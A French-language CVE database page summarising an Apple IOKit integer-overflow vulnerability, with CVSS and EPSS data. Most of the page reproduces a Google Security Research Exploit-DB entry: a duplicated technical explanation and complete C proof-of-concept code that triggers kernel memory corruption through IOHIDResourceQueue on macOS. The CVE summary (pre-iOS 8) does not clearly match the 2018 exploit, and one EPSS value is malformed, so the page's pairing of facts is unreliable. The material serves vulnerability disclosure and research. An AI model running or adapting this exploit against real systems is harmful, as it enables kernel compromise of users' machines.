CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Integer overflow in IOKit in Apple iOS before 8 and Apple TV before 7 allows attackers to execute arbitrary code in a privileged context via an application that provides crafted API arguments.
Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.2%
–
–
2022-03-06
–
–
2.2%
–
–
2022-04-03
–
–
2.2%
–
–
2022-05-08
–
–
2.2%
–
–
2022-10-23
–
–
2.2%
–
–
2022-12-11
–
–
2.43%
–
–
2023-02-26
–
–
2.43%
–
–
2023-03-12
–
–
–
0.31%
–
2023-05-28
–
–
–
0.43%
–
2023-08-27
–
–
–
0.34%
–
2023-12-24
–
–
–
0.34%
–
2024-01-28
–
–
–
0.43%
–
2024-02-11
–
–
–
0.43%
–
2024-06-02
–
–
–
0.43%
–
2024-12-22
–
–
–
0.43%
–
2025-01-19
–
–
–
0.43%
–
2025-01-26
–
–
–
0.43%
–
2025-01-19
–
–
–
0.43%
–
2025-01-25
–
–
–
0.43%
–
2025-03-18
–
–
–
–
0.66%
2025-03-30
–
–
–
–
2.07%
2025-04-06
–
–
–
–
2.1%
2025-04-06
–
–
–
–
2.1,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2018-10-21 22h00 +00:00 Auteur : Google Security Research EDB Vérifié : Yes
/*
IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method,
which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods.
I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866)
IOHIDResourceQueue::enqueueReport has basically the same bug:
Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report)
{
UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader);
UInt32 reportSize = report ? (UInt32)report->getLength() : 0;
UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a)
UInt32 head;
UInt32 tail;
UInt32 newTail;
const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
IODataQueueEntry * entry;
// Force a single read of head and tail
head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED);
tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED);
if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b)
{
return false;
}
if ( tail >= head )
{
// Is there enough room at the end for the entry?
if ((getQueueSize() - tail) >= entrySize )
{
entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
entry->size = dataSize;
bcopy(header, &entry->data, headerSize);
if ( report )
report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c)
Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion
of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a)
giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c)
for the actually memory write operation.
The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one
of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these.
A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards,
so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.)
You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example
from the IOHIDFamily code, giving it the correct entitlement and running it.
*/
// @i41nbeer
/*
iOS/MacOS kernel memory corruption due to integer overflow in IOHIDResourceQueue::enqueueReport
IOHIDResourceQueue inherits from IOSharedDataQueue and adds its own ::enqueueReport method,
which seems to be mostly copy-pasted from IOSharedDataQueue and IODataQueue's ::enqueue methods.
I reported a bunch of integer overflows in IODataQueue over four years ago (CVE-2014-4389, apple issue 607452866)
IOHIDResourceQueue::enqueueReport has basically the same bug:
Boolean IOHIDResourceQueue::enqueueReport(IOHIDResourceDataQueueHeader * header, IOMemoryDescriptor * report)
{
UInt32 headerSize = sizeof(IOHIDResourceDataQueueHeader);
UInt32 reportSize = report ? (UInt32)report->getLength() : 0;
UInt32 dataSize = ALIGNED_DATA_SIZE(headerSize + reportSize, sizeof(uint32_t)); <--- (a)
UInt32 head;
UInt32 tail;
UInt32 newTail;
const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
IODataQueueEntry * entry;
// Force a single read of head and tail
head = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->head, __ATOMIC_RELAXED);
tail = __c11_atomic_load((_Atomic UInt32 *)&dataQueue->tail, __ATOMIC_RELAXED);
if ( tail > getQueueSize() || head > getQueueSize() || dataSize < headerSize || entrySize < dataSize) <--- (b)
{
return false;
}
if ( tail >= head )
{
// Is there enough room at the end for the entry?
if ((getQueueSize() - tail) >= entrySize )
{
entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
entry->size = dataSize;
bcopy(header, &entry->data, headerSize);
if ( report )
report->readBytes(0, ((UInt8*)&entry->data) + headerSize, reportSize); <--- (c)
Report is the IOMemoryDescriptor which wraps the stucture input to the io_connect_call, it's wrapping a portion
of userspace so we can actually make an IOMemoryDescriptor with a length of 0xffffffff. This will overflow at (a)
giving us a small value for dataSize. This will pass the checks at (b) but then the reportSize value is used at (c)
for the actually memory write operation.
The IOHIDResource is used when userspace wants to implement an HID device; to exploit this you need there to actually be one
of these devices. If you have the com.apple.hid.manager.user-access-device entitlement you can create one of these.
A bunch of daemons do possess this entitlement, for example bluetoothd needs it to implement bluetooth HID keyboards,
so if you have a bluetooth keyboard connected you can trigger this bug without needing com.apple.hid.manager.user-access-device.)
You can test this PoC either by connecting a bluetooth HID device, or by building the IOHIDResource keyboard example
from the IOHIDFamily code, giving it the correct entitlement and running it.
Tested on MacOS 10.13.6 (17G65)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
int main(int argc, char** argv){
printf("pid: %d\n", getpid());
kern_return_t err;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOHIDUserDevice"));
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 0, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got client\n");
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
// open
inputScalar[0] = 0;
inputScalarCnt = 1;
err = IOConnectCallMethod(
conn,
1,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
return 0;
}
printf("called external method open\n");
mach_vm_address_t addr = 0x4100000000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 0, mach_task_self(), &addr, &size, 0);
if (err != KERN_SUCCESS){
printf("IOConnectMapMemory failed:0x%x\n", err);
return 0;
}
printf("mapped queue memory here: %016llx\n", addr);
char* buf = malloc(0x100000000);
memset(buf, 'A', 0x100000000);
inputScalar[0] = 0x0;
inputScalar[1] = 0x0;
inputScalarCnt = 3;
outputScalarCnt = 0;
err = IOConnectCallMethod(
conn,
13, // setreport
inputScalar,
inputScalarCnt,
buf,
0xffffffff,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
return 0;
}
return 0;
}